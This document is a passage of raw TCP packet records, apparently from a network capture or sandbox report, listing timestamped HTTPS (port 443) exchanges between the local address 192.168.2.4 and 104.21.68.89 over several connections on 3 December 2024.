Dec 3, 2024 17:45:17.237458944 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.240672112 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.240741968 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.243633986 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.243808985 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.247201920 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.247495890 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.249212980 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.249308109 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.252968073 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.253072023 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.256551027 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.256660938 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.260282040 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.260390043 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.262236118 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.262365103 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.265836000 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.265964031 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.368911028 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.368988037 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.372513056 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.372574091 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.374515057 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.374562025 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.378057957 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.378108025 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.381405115 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.381455898 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.388154984 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.388165951 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.388186932 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.388210058 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.388247013 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.388261080 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.388292074 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.399122953 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.399173021 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.399188995 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.399214983 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.399235010 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.399254084 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.410010099 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.410033941 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.410121918 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.410123110 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.410146952 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.410202026 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.420517921 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.420543909 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.420578957 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.420597076 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.420624018 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.420638084 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.431251049 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.431274891 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.431329012 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.431337118 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.431404114 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.440881968 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.440910101 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.440953016 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.440963030 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.441024065 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.568387032 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.568413019 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.568454027 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.568470001 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.568489075 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.568501949 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.575598955 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.575634003 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.575659990 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.575689077 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.575702906 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.575723886 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.583839893 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.583858967 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.583897114 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.583905935 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.583930969 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.583955050 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.592519045 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.592542887 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.592578888 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.592586040 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.592619896 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.592633963 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.599953890 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.599977970 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.600018024 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.600033998 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.600061893 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.600085974 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.607850075 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.607894897 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.607916117 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.607960939 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.607966900 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.608005047 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.616436005 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.616478920 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.616502047 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.616511106 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.616548061 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.616569996 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.624667883 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.624689102 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.624757051 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.624766111 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.624794960 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.624819040 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.769922972 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.769953966 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.770016909 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.770047903 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.770077944 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.770097971 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.777040958 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.777062893 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.777097940 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.777105093 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.777132034 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.777151108 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.784322977 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.784344912 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.784375906 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.784385920 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.784413099 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.784430981 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.792620897 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.792642117 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.792678118 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.792686939 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.792717934 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.792736053 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.800513983 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.800534964 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.800574064 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.800585032 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.800615072 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.800632954 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.808247089 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.808264971 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.808320999 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.808337927 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.808391094 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.816349983 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.816373110 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.816417933 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.816431999 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.816459894 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.816478968 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.824359894 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.824379921 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.824433088 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.824443102 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.824472904 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.824492931 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.971676111 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.971698046 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.971743107 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.971765995 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.971779108 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.971818924 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.977894068 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.977920055 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.977988005 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.977994919 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.978035927 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.986100912 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.986146927 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.986174107 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.986181021 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.986202955 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.986227989 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.994142056 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.994167089 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.994245052 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.994245052 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.994251966 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.994288921 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.002245903 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.002264977 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.002316952 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.002324104 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.002377033 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.009932995 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.009978056 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.010004997 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.010011911 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.010042906 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.010082960 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.017160892 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.017184973 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.017276049 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.017282963 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.017324924 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.025307894 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.025341034 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.025376081 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.025382042 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.025418997 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.025439024 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.177294016 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.177315950 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.177398920 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.177438021 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.177454948 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.177534103 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.184684992 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.184709072 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.184748888 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.184758902 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.184803009 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.184906006 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.191787958 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.191812038 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.191910028 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.191917896 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.192020893 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.199970007 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.199995041 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.200054884 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.200068951 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.200078964 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.200160980 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.208070993 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.208095074 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.208182096 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.208200932 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.208257914 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.215652943 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.215676069 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.215734005 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.215744019 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.215791941 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.215818882 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.223829985 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.223881960 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.223911047 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.223918915 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.223975897 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.223975897 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.230952024 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.230978966 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.231056929 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.231067896 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.231103897 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.231103897 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.374236107 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.374268055 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.374608040 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.374643087 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.375036955 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.377017021 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.377140045 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:18.377173901 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:18.379056931 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:19.175230980 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:19.175275087 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:19.302939892 CET	49918	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:19.302989006 CET	443	49918	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:19.303349972 CET	49918	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:19.303715944 CET	49918	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:19.303729057 CET	443	49918	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:20.563930035 CET	443	49918	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:20.564002991 CET	49918	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:20.564464092 CET	49918	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:20.564474106 CET	443	49918	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:20.564706087 CET	49918	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:20.564712048 CET	443	49918	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:22.185682058 CET	443	49918	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:22.185735941 CET	49918	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:22.185765028 CET	443	49918	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:22.185811996 CET	49918	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:22.185847044 CET	443	49918	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:22.185889006 CET	49918	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:22.188838959 CET	49918	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:22.188858032 CET	443	49918	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:22.208265066 CET	49926	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:22.208374023 CET	443	49926	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:22.208451986 CET	49926	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:22.208758116 CET	49926	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:22.208786964 CET	443	49926	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:23.534934044 CET	443	49926	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:23.534991980 CET	49926	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:23.619690895 CET	49926	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:23.619710922 CET	443	49926	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:23.620019913 CET	49926	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:23.620024920 CET	443	49926	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:25.106945038 CET	443	49926	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:25.107039928 CET	443	49926	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:25.107079029 CET	49926	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:25.107153893 CET	49926	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:25.110496998 CET	49926	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:25.110519886 CET	443	49926	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:25.277081966 CET	49933	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:25.277143955 CET	443	49933	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:25.277236938 CET	49933	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:25.278156042 CET	49933	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:25.278170109 CET	443	49933	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:26.493360996 CET	443	49933	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:26.493486881 CET	49933	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:26.494014025 CET	49933	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:26.494026899 CET	443	49933	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:26.496655941 CET	49933	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:26.496665001 CET	443	49933	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:28.142390966 CET	443	49933	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:28.142465115 CET	49933	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:28.142493963 CET	443	49933	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:28.142535925 CET	49933	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:28.142537117 CET	443	49933	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:28.142574072 CET	49933	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:28.147654057 CET	49933	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:28.147671938 CET	443	49933	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:28.238940954 CET	49940	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:28.238982916 CET	443	49940	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:28.239319086 CET	49940	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:28.239707947 CET	49940	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:28.239722967 CET	443	49940	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:29.460340977 CET	443	49940	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:29.462059021 CET	49940	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:29.479140043 CET	49940	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:29.479159117 CET	443	49940	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:29.479446888 CET	49940	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:29.479454041 CET	443	49940	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:31.051011086 CET	443	49940	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:31.051089048 CET	49940	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:31.051099062 CET	443	49940	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:31.051146984 CET	49940	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:31.054059982 CET	49940	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:31.054076910 CET	443	49940	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:31.142569065 CET	49948	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:31.142611027 CET	443	49948	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:31.142826080 CET	49948	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:31.143203020 CET	49948	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:31.143217087 CET	443	49948	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:32.416184902 CET	443	49948	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:32.419083118 CET	49948	443	192.168.2.4	104.21.68.89
